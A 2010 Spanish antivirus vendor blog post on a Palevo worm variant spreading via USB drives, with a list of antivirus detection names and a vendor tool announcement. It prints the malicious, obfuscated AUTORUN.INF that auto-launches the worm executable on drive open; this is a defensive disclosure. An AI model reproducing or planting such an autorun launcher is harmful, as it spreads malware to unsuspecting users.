Otra variante de Palevo que se propaga por pendrive (ejecuta fichero TINA.EXE desde el AUTORUN.INF)
Esta vez ya muy controlado nos llega muestra de esta variante de Palevo:
File name: tina.exe.vir
Submission date: 2010-08-25 08:17:06 (UTC)
Current status: queued queued analysing finished
Result: 39/ 42 (92.9%)
VT Community
not reviewed
Safety score: –
Compact Print results Antivirus Version Last Update Result
AhnLab-V3 2010.08.25.00 2010.08.24 Win-Trojan/Xema.variant
AntiVir 8.2.4.38 2010.08.25 TR/Malagent.A.1405
Antiy-AVL 2.0.3.7 2010.08.23 Worm/Win32.Palevo.gen
Authentium 5.2.0.5 2010.08.25 W32/Rimecud.I.gen!Eldorado
Avast 4.8.1351.0 2010.08.24 –
Avast5 5.0.594.0 2010.08.24 Win32:SuspBehav-C
AVG 9.0.0.851 2010.08.24 Cryptic.ABA
BitDefender 7.2 2010.08.25 Trojan.Generic.4131171
CAT-QuickHeal 11.00 2010.08.24 Trojan.Malagent
ClamAV 0.96.2.0-git 2010.08.25 Suspect.Trojan.Generic.FD-2
Comodo 5848 2010.08.24 TrojWare.Win32.Kryptik.ESG
DrWeb 5.0.2.03300 2010.08.25 Trojan.Packed.20388
Emsisoft 5.0.0.37 2010.08.25 P2P-Worm.Win32.Palevo!IK
eSafe 7.0.17.0 2010.08.24 Win32.Pilleuz
eTrust-Vet 36.1.7814 2010.08.24 Win32/Rimecud.AKC
F-Prot 4.6.1.107 2010.08.24 W32/Rimecud.I.gen!Eldorado
F-Secure 9.0.15370.0 2010.08.25 Trojan.Generic.4131171
Fortinet 4.1.143.0 2010.08.24 W32/Palevo.AC!worm
GData 21 2010.08.24 Trojan.Generic.4131171
Ikarus T3.1.1.88.0 2010.08.25 P2P-Worm.Win32.Palevo
Jiangmin 13.0.900 2010.08.25 Worm/Palevo.xbi
Kaspersky 7.0.0.125 2010.08.25 P2P-Worm.Win32.Palevo.fuc
McAfee 5.400.0.1158 2010.08.25 Generic.dx!sxi
McAfee-GW-Edition 2010.1B 2010.08.25 Generic.dx!sxi
Microsoft 1.6103 2010.08.25 Worm:Win32/Rimecud.B
NOD32 5394 2010.08.24 a variant of Win32/Kryptik.ESG
Norman 6.05.11 2010.08.24 W32/Suspicious_Gen2.BDTNG
nProtect 2010-08-25.01 2010.08.25 Trojan.Generic.4131171
Panda 10.0.2.7 2010.08.25 W32/ButterflyBot.B.worm
PCTools 7.0.3.5 2010.08.25 Malware.Pilleuz
Prevx 3.0 2010.08.25 High Risk Cloaked Malware
Rising 22.62.02.03 2010.08.25 Trojan.Win32.Generic.520869F1
Sophos 4.56.0 2010.08.25 Mal/Palevo-A
Sunbelt 6788 2010.08.25 Trojan.Win32.Generic!BT
SUPERAntiSpyware 4.40.0.1006 2010.08.25 –
Symantec 20101.1.1.7 2010.08.25 W32.Pilleuz
TheHacker 6.5.2.1.355 2010.08.24 –
TrendMicro 9.120.0.1004 2010.08.25 WORM_PALEVO.BH
TrendMicro-HouseCall 9.120.0.1004 2010.08.25 WORM_PALEVO.BH
VBA32 3.12.14.0 2010.08.24 P2P-Worm.Win32.Palevo.fuc
ViRobot 2010.8.25.4006 2010.08.25 Worm.Win32.P2P-Palevo.124416.N
VirusBuster 5.0.27.0 2010.08.24 Trojan.Kryptik.VSJ
Additional informationShow all
El fichero en cuestion es lanzado por el siguiente AUTORUN.INF:
[autorun]
*takoseksi
#seksi
shell\open\command=zgodna\\\tina.exe
@äÊÑÀäë÷êœ÷ëäꜚ÷äêëäëïøžœšäËÀÑŽ×ìôàñë÷ÊÄÔÊŒË×ÊÔŒŠÔÊœš÷Êë÷ôñëÀŽ×ÔËžôëôŒËÔž÷ŒŠËïžôŒŠêôžêñàëìÃË×ÀÑäëž÷äëïøšøžœôì÷ëñÍâʽÌ÷áÔëž÷œëšôïžœëšïžôëôïž÷àñëžôëàñž÷Ô뜚÷êôïøžœšëôïøžàñëôàêôë÷àñêëô÷ñàÔÊÀ×ËÔÏØŽŒŠÌÔÊË×ÑÀÌÔÀÑË×Ô
Shell\open\command=zgodna\\\tina.exe
#ôàñôê÷œëlPD?ASL?D?lwqdwq
shellexecute=zgodna\\\tina.exe
$A?SfP?WQkl?smvas?LFPDL?q
open=zgodna\\tina.exe
;farlWQ??LF?wqôàäÝÆÀÄÖÉÇÕÝÀÜäæûôëáàýæû
shell\explore\command=zgodna\\\tina.exe
;àôÄÝÆÀäýéÀÄÖÝÉàüáûôäìûÔÝÄÆÄÇÕÉÆÖýàé
action=Open folder to view files using Windows Explorer
;àôûÀÖÉäÝÀöéäýÀÖÄÀôäÕÝàÔÛÝÆÀäÀÝÖÄÆÀÕÚöé
USEAUTOPLAY=1
:àôàöéàôûÀËÝÖÉËÄÀÖÇÝÉäàýôûà
icon=SHELL32.dll,4
:ïàôûïëÔÄÆÛäàöéäçàéäÝÀäôûÝÀçõýäöéäàýöéàöäæëä
·
Pasamos a controlarlo a partir de la version 1,73 del ELIPALEVO.exe, que estará disponible a las 15 horas de hoy.
saludos
ms, 25-8-2010
NOTA: Se recomienda vacunar con el ELIPEN.EXE tanto el ordenador como los pendrives, para evitar la propagacion de este tipo de malwares
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Los comentarios están cerrados.